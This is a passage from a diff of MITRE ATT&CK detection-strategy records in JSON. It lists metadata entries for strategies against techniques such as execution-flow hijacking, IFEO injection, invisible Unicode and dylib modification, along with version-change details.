+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--387ae9f0-0b8b-49b9-ab85-8f325a583d24",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0517",
+                            "external_id": "DET0517"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow through the AppDomainManager on Windows.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--aa3484d0-d7ae-40e2-8a44-6b963883a35d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7ee8426e-2b65-44ed-b6d4-3800b92adf2e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0577",
+                            "external_id": "DET0577"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow through the KernelCallbackTable on Windows.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--da853af7-f2e4-45c2-b78f-3d960fff638e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--07b1eb42-4f7b-4420-972e-2f28f17c0fa0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0038",
+                            "external_id": "DET0038"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow using Executable Installer File Permissions Weakness",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4f132f21-1287-4fc2-a13e-d7770d856610"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4b2bc278-fc80-4ff8-87a3-a6843a9e683a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0004",
+                            "external_id": "DET0004"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow using Path Interception by PATH Environment Variable.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--bbd003ec-4208-48bb-9ad5-b9dd627fdd14",
+                        "x-mitre-analytic--00b5d9a8-a794-4d7c-90df-71c4021e0a46",
+                        "x-mitre-analytic--b2261c7f-664b-400c-b8ba-8b5bc3bac75a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9050bfb8-840d-4464-b4e8-7a0dbdece715",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0564",
+                            "external_id": "DET0564"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow using Path Interception by Search Order Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--578c821c-f8e3-45e7-a9b4-9aed6c84309a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8276f61b-0147-4e72-94fb-7cdd47dc60ec",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0479",
+                            "external_id": "DET0479"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow using the Windows COR_PROFILER.",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--39d115fc-5e7b-423f-94da-a3b4242e07b8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eca47fcc-6bee-43b1-9569-631a22be5fe0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0152",
+                            "external_id": "DET0152"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow: Dylib Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a1e502e2-d940-4c71-9eac-893e7a3025e3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--da2107bd-4733-4d0b-a35c-33f7883e9ae9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0435",
+                            "external_id": "DET0435"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Hijack Execution Flow: Dynamic Linker Hijacking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--048adb6e-49a1-463e-bc0d-0a9a543cf0ce",
+                        "x-mitre-analytic--5907bfc2-a5d6-4ff1-bba8-8b94c9835ed6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d65ea5cc-52c6-4ec6-98a8-eef0be23ee72",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0422",
+                            "external_id": "DET0422"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for IFEO Injection on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3e5b15b0-e6b2-402a-9c4f-e483c968a38e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--29d1e77a-a05e-4ead-8272-b254992cd2ba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0067",
+                            "external_id": "DET0067"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Ignore Process Interrupts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8d75d4b3-6748-4d1c-936c-129ee56a12a5",
+                        "x-mitre-analytic--80e9341d-7ea4-4684-8f27-54566e996ce6",
+                        "x-mitre-analytic--c9079261-caa7-4cfe-8be6-1359db599d27"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1e08be7e-451c-4b10-9e65-b6dbf8d54b38",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0286",
+                            "external_id": "DET0286"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Impersonation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e4246c20-fbe4-4750-a29e-44e3fe179bf2",
+                        "x-mitre-analytic--5c7a8194-f0cb-498a-98c6-5928859bf79f",
+                        "x-mitre-analytic--1305f37f-8333-4d86-9714-340b66c65771",
+                        "x-mitre-analytic--2266c86a-a47e-46ac-aa6d-c1eb6d49a1e5",
+                        "x-mitre-analytic--250d2977-7b94-4041-a299-0f2f1532eb95"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6ab338c4-9ed3-4f63-9462-b13cea5a68b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0189",
+                            "external_id": "DET0189"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Indicator Removal from Tools - Post-AV Evasion Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2c94147a-a556-4fa1-92f8-d3c4367f6f2e",
+                        "x-mitre-analytic--66bab948-9baa-4f5c-b259-333eb2ac08ad",
+                        "x-mitre-analytic--3ef92295-ecbf-417a-b72a-f6cd189ca3a1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f54b8799-acfd-4df4-a2c4-e83071750bde",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0568",
+                            "external_id": "DET0568"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Input Injection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0f05915c-e146-4921-840b-1a08774ca4d2",
+                        "x-mitre-analytic--b61673d6-244f-4888-9370-1a3ef391a6c2",
+                        "x-mitre-analytic--4b47697b-ff9b-4af7-a079-d34210cebdab"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ded7322c-64ba-4f6b-9aca-77a537798cab",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-23 18:44:43.178000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0920",
+                            "external_id": "DET0920"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Invisible Unicode",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1a9f097a-d5b9-424d-ae20-19ed73eb9dcf",
+                        "x-mitre-analytic--a32c4f38-feaf-4291-9dad-3043114b4d37",
+                        "x-mitre-analytic--6195e912-ed73-4ec7-a03b-097631ec0b26"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-23 18:44:43.178000+00:00\", \"old_value\": \"2026-04-23T18:44:43.178Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:23:25.386Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--206790b2-16bc-46db-a605-8bcff576c161",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.672000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0322",
+                            "external_id": "DET0322"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Junk Code Obfuscation with Suspicious Execution Patterns",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2ae1dd34-c666-488f-8ad6-752b8a6acae1",
+                        "x-mitre-analytic--f606ec01-15d2-4432-b91b-669411205015",
+                        "x-mitre-analytic--fcc2b0dc-93c4-49de-abfe-6273c24d1d89"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.672000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--df1da8e4-cabf-42f0-8f5f-2fa8086b1423",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0450",
+                            "external_id": "DET0450"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Kernel Modules and Extensions Autostart Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c221d379-1dcb-4ca7-908e-59f6ed7afaed",
+                        "x-mitre-analytic--092689c7-be8a-4d11-99d8-7dd96afa938d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4f95fef5-3b5e-435a-ad00-33d2d9765640",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0216",
+                            "external_id": "DET0216"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for LC_LOAD_DYLIB Modification in Mach-O Binaries on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7aaf568b-bc31-4fb0-8543-12ee281a0b85"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ae3cb4bc-da0a-4e5b-b4ad-96617eccefaf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
